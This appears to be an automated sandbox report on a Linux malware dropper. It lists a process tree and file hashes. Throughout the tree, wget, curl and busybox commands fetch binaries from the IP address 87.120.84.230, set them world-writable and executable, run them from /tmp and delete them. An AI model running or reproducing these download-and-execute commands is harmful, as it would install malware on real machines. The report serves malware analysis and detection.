- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:945
-
-
/bin/chmodchmod 777 KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB./KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm KeW92ny8kVqLl4usfbwmgKxREiCtAc5GHB2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:951
-
-
/bin/chmodchmod 777 sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES./sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm sqyCJQVXqgnToECHZpDmPrSMRFMB7mDMES2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:957
-
-
/bin/chmodchmod 777 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT./2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 2rOBjn4n3qVx8hT8I1rUyTOfwjnF6IzSYT2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:963
-
-
/bin/chmodchmod 777 UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW./UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm UCTHLRDDehvmNDeQqd2FH0jqUohDghvHWW2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:969
-
-
/bin/chmodchmod 777 SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc./SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm SXxs5GFac5y22CZnJWmqEr3DmeX45PCayc2⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:975
-
-
/bin/chmodchmod 777 LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt./LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm LPaC2eJSRhuKBsEebLyyc29CdaQjGdCXFt2⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:981
-
-
/bin/chmodchmod 777 LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/LD7aFIZkwpYfOzQhLZQITHyUYxNh7m2517./LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm LD7aFIZkwpYfOzQhLZQITHyUYxNh7m25172⤵PID:984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97